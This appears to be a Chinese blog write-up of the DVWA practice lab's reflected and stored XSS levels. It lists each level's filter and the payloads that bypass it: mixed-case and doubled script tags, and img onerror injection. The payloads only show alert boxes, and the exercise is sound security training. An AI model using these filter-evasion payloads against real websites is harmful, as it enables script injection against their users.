xss--dvwa靶场

发布时间 2023-08-09 16:15:00作者: na2co3-

xss reflected

low

payload:<script>alert('xxx')</script>

medium

防御措施:使用str_replace函数替换了所有的<script>

 绕过:

str_replace对大小写并不敏感,或者双写绕过

payload:<Script>alert('xxx')</script>

<scr<script>ipt>alert('xxx')</script>

high

防御措施

 使用preg_replace函数,只要出现script都会被替换为空

绕过

使用img标签

payload:<img src = ""  onerror=alert("xss")>

xss(stored)

low

payload:<script>alert('xxx')</script>

medium

防御措施

对message使用htmlspecialchars函数进行了处理,所以无法在这里进行注入

对name使用了str_replace函数进行了处理,将name作为注入的目标

 绕过

name对长度有限制,所以通过修改网站源码,将name的长度修改成50,然后进行注入,大写或者双写绕过都可以

payload:<Script>alert('xss')</script>

high

防御:对message进行了htmlspecialchars()的处理,对name进行了preg_replace()的处理,所以在name处注入,并且不能使用<script>标签,所以使用img标签进行注入。

绕过

 payload:<img src = "" onerror="alert ('12345')">